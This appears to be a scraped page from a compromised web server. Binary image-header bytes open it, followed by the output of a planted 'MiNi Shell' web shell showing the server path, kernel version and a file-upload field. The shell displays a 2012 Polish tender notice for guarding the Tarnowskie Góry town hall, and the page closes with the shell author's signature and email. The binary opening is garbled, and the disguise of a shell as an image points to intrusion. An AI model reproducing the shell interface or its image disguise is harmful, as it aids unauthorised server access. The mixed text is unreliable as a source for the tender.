JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/52839-N-2012.html

<p class="kh_header"><b>Tarnowskie Góry: Ochrona mienia i budynków Urzędu Miejskiego w Tarnowskich Górach</b><br>
<b>Numer ogłoszenia: 52839 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Tarnowskie Góry , Rynek 4, 42-600 Tarnowskie Góry, woj. śląskie, tel. 032 3933600, 3933855, faks 032 3933602.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.tarnowskiegory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona mienia i budynków Urzędu Miejskiego w Tarnowskich Górach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na ochronie mienia i budynków Urzędu Miejskiego w Tarnowskich Górach.
1.Całodobowe,  nieprzerwane  pełnienie  ochrony mienia i budynków przez  pracowników  ochrony 	bez 	licencji:
   - jeden posterunek całodobowy we wszystkie dni tygodnia i w święta w budynku przy ul. Rynek 4                    	   w  Tarnowskich Górach,
   - jeden posterunek  całodobowy  we  wszystkie    dni    tygodnia   i   w   święta   w    budynku      	   przy ul. Sienkiewicza 2  w  Tarnowskich Górach.  
2.Obowiązki pracowników ochrony:
      1)Nadzór  nad  ruchem  osobowym  w  obiekcie, w  tym  obserwacja  osób  wchodzących	 				wychodzących   do  obiektu, obserwacja   ciągów  komunikacyjnych,  zwłaszcza  w obrębie			   pomieszczeń kasowych, dziedzińca (tzw. Patio).
2) Nie wpuszczanie osób znajdujących się pod wpływem  alkoholu  lub  środków   odurzających 	(narkotyki, itp.), a  także  spowodowanie  usunięcia  poza  teren  obiektu  osób  zakłócających     
    właściwą  pracę Urzędu.
3) Nie  wpuszczanie    na    teren   obiektu   akwizytorów,   osób   o   podejrzanym  wyglądzie.
4) Zwracanie uwagi na podejrzane torby, paczki, pozostawione na strzeżonym  terenie,  mogące  	 zawierać  ładunek wybuchowy,   w  razie  podejrzenia  istnienia  zagrożenia  powiadomienie                                       
     grupy  interwencyjnej  i  odpowiednich  służb  wskazanych  w pkt.13. 
5) Ochrona  stacjonarno - obchodowa  przed  włamaniem, włamaniem  z  kradzieżą,  kradzieżą,     	  zalaniem, pożarem, zniszczeniem, uszkodzeniem  i innym bezprawnym naruszeniem mienia	  	   Zamawiającego.
6) Ochrona  przed   zaborem  lub  uszkodzeniem  wyposażenia  w  obiektach  oraz  dokumentów 	 będących  własnością Zamawiającego.
7) Obsługa dozoru wizyjnego w budynku Urzędu Miejskiego  przy ul. Rynek 4, pok. 3, w   tym:
      a)dozór systemu kamer umieszczonych na terenie obiektu,
   	b)stały nadzór z pełnym wykorzystaniem  możliwości  systemu  dozoru  wizyjnego                	  w zakresie niedopuszczenia do kradzieży,  rozboju,  niszczenia  majątku  i   	zabezpieczenie  	  mienia Zamawiającego,
      c)przekazywanie  dozoru  wizyjnego  kolejnej  zmianie  ochrony  z  uwzględnieniem  	 			zaistniałych, zauważonych usterek,
    	d)natychmiastowa  reakcja  na wszystkie zauważone nieprawidłowości na terenie obiektu,     		zaobserwowane  przez  system  dozoru  wizyjnego, oraz  zaznaczenia w księdze dyżurów 	  		zauważonych dzięki dozorowi wizyjnemu nieprawidłowości, usterek lub prób kradzieży 	 		oraz dokładne określenie jakie podjęto środki aby zapobiec zdarzeniu.
   	    e) zgłaszanie  nieprawidłowości  systemu  lub  nieprawidłowości  zarejestrowane przez 		   	  system Naczelnikowi Wydziału Administracyjno-Gospodarczego i  Kierownikowi    					 Ochrony,
	 f)dbanie  o  powierzony  przez  Zamawiającego  sprzęt  -  urządzenia  dozoru  wizyjnego.
8)Zamykanie i otwieranie obiektów chronionych o określonych godzinach, uzgodnionych                             	z Zamawiającym w Protokole  przekazania i przejęcia pod ochronę mienia i budynków 	Urzędu Miejskiego w Tarnowskich Górach. 	
9) Zamykanie i otwieranie windy w budynku przy ul. Sienkiewicza 2 o określonych godzinach, 	uzgodnionych z Zamawiającym  w Protokole  przekazania i przejęcia pod ochronę mienia            	i budynków 	Urzędu Miejskiego w Tarnowskich Górach. 	          	
    10) Udostępnienie pomieszczeń biurowych w dniach i  godzinach  wolnych  od  pracy  wyłącznie 	 	  pracownikom Urzędu i radnym Rady Miejskiej, a także osobom uczestniczącym         	 w organizowanych przez Urząd Miejski i Radę Miejską spotkaniach, 	  sympozjach, konferencjach, sesjach  Rady Miejskiej,  Komisjach  Rady  Miejskiej                                       	      po  wcześniejszym poinformowaniu  pracownika ochrony  przez  Zamawiającego.
	    11) Po  godzinach  pracy  Urzędu  sprawdzanie  w   budynkach   zabezpieczeń   wszystkich 
                  drzwi   zewnętrznych.
12) Prowadzenie cyklicznych (nie rzadziej niż co 2 godziny) obchodów po  zamknięciu  Urzędu  		 	ze  zwróceniem  uwagi  na stan zabezpieczenia    obiektu,    sprawdzenie    pomieszczeń   		 	oraz   zabezpieczeń technicznych, takich jak: zamki, kłódki,   plomby,  okna,  drzwi,  drzwi   	 		zewnętrzne, oświetlenie,  alarmy, kraty oraz  reagowanie  na wszelkie sygnały  wskazujące  	 				na  zagrożenie  mienia  Zamawiającego.
   13) Zapobieganie niepożądanym zdarzeniom, a w przypadku ich wystąpienia, podejmowanie 	odpowiednich działań (w tym powiadamianie i współdziałanie z odpowiednimi służbami, 	jak: Policja, Straż Pożarna, Straż Miejska, Gminny Zespół Zarządzania Kryzysowego, 	Pogotowie Energetyczne, Ratunkowe, Wodociągowe, osób wskazanych przez 	Zamawiającego itp.)  w szczególności, gdy zdarzenie dotyczy: kradzieży, pożaru, 	awarii instalacji elektrycznej,telefonicznej, cieplnej, wodno - kanalizacyjnej, zakłócenia 	porządku, ataku terrorystycznego,  itp.
	 14)  Bieżąca  obsługa  istniejącej  centrali p.poż.. uzbrajanie  i  rozbrajanie  systemów 			alarmowych pomieszczeń kasowych.
		15)Podejmowanie interwencji w razie zagrożenia bezpieczeństwa osób przebywających                       	        w budynkach Urzędu i mienia Zamawiającego  lub stwierdzenia naruszenia porządku 	     		       publicznego. 
     16) Utrzymywanie  łączności   między  pracownikami  ochrony,  a   grupami   interwencyjnymi.
      17) Wstępne zabezpieczenie  śladów  i  dowodów  zaistniałych  po niepożądanych zdarzeniach.
   	18)Taktowne  i  profesjonalne  traktowanie  osób  wchodzących  do  budynku, udzielanie im 	 	  		 niezbędnych informacji. 
     19)Prowadzenie  księgi  dyżurów,  wpisywanie  informacji  o  objęciu  dyżuru, przebiegu służby, 
          godzin wejścia i wyjścia do obiektów  chronionych  pracowników  Urzędu  w  dni ustawowe 
   	   i urzędnicze  wolne  od  pracy  oraz  w  dni robocze po  godzinach  urzędowania.  	 	  Wpisywanie również  informacji  o wydanych   kluczach , a  także  zdarzeniach  zaistniałych  		w  trakcie pełnienia służby, dokonywanych  kontrolach, zaleceniach przełożonych. 
    20)Przyjmowanie i wydawanie pracownikom Urzędu kluczy od pomieszczeń biurowych, w tym 	 pomieszczeń  szczególnie  chronionych,  technicznych  i  magazynowych. 
  21)Zapalanie  i  gaszenie  w  chronionych  obiektach  świateł nocnych  zewnętrznych                        				 i   wewnętrznych  w  zależności  od  pory  roku.
	  22)Pełna znajomość topografii chronionych obiektów - rozkładu pomieszczeń, drzwi i dróg 	   	   		 ewakuacyjnych itp.
     23)Znajomość   rozmieszczenia  i  umiejętność  obsługi  głównych  wyłączników  prądu,  	 		    instalacji ppoż., zaworów  wodnych. 
	 24)Natychmiastowe reagowanie na wszelkie sygnały z instalacji alarmowych zainstalowanych       			w budynkach,  zgodnie  z  procedurami  postępowania,  określonymi  w  szczegółowych 			instrukcjach.  
	 25)Obserwowaniu prawidłowości działania dźwigu w budynku przy ul. Sienkiewicza 2                       	    a w przypadku awarii dźwigu natychmiastowym powiadomieniu konserwatora dźwigu                          	         i  odpowiedniego przedstawiciela Zamawiającego.	
      26) Po godzinach  pracy  Urzędu  obsługa  w  kancelarii ogólnej  telefonu  stacjonarnego  w  zakresie zapewnienia  kontaktu  z  Zamawiającym  i  odpowiednimi  służbami. 
27) Współdziałanie z komórkami organizacyjnymi Urzędu.    
3.Wykonawca  zapewni  stały  bezpośredni  kontakt  z  osobami  nadzorującymi  i  kontrolującymi   pracę ochrony obiektów Zamawiającego. 
4.Wykonawca  zapewni  jednolite  umundurowanie  i  identyfikatory,  które  będą  wymagały  akceptacji  Zamawiającego.
5.Wykonawca  wyposaży  pracowników  ochrony   w  systemy  łączności  bezprzewodowej.
6. Wykonawca  powinien  posiadać  grupy  interwencyjne, co najmniej 2 - osobowe   z licencją pracownika ochrony I lub II stopnia, wyposażone w samochody zdolne do  odjęcia interwencji na obiektach Zamawiającego w czasie nie dłuższym niż 5 minut w nocy i 15 minut w dzień..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 8.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie Koncesji na prowadzenie działalności gospodarczej w zakresie przedmiotu   zamówienia wydanej przez MSWiA na podstawie ustawy z dnia 22 sierpnia 1997 roku               o ochronie osób i mienia (Dz. U. z 2005 r. Nr 145, poz. 1221 z późn. zm.) w związku                z art. 15 ust. 3 ustawy z dnia 19 listopada 1999 r. Prawo działalności gospodarczej (Dz. U. z 1999 r. Nr 101, poz. 1178 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się posiadaniem wiedzy i doświadczenia w zakresie wykonania przedmiotu zamówienia polegającym na wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,                 co najmniej dwóch usług obejmujących swym zakresem ciągłą ochronę mienia i budynków  użyteczności publicznej</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>całodobową stacją monitorowania, dwiema zmotoryzowanymi grupami (skład grupy minimum dwuosobowy) interwencyjnymi,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga by Wykonawca posiadał środki finansowe lub zdolność kredytową  w wysokości minimum 50.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w następujących zakresach.
Zmiana ceny ofertowej w przypadku: a)ustawowej zmiany stawki podatku VAT w trakcie realizacji przedmiotu zamówienia                    o wielkość tej zmiany;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htpp://bip.tarnowskiegory.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 10:00, miejsce: Urząd Miejski, ul. Rynek 4, 42-600 Tarnowskie Góry, Biuro Zamówień Publicznych, pok. 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com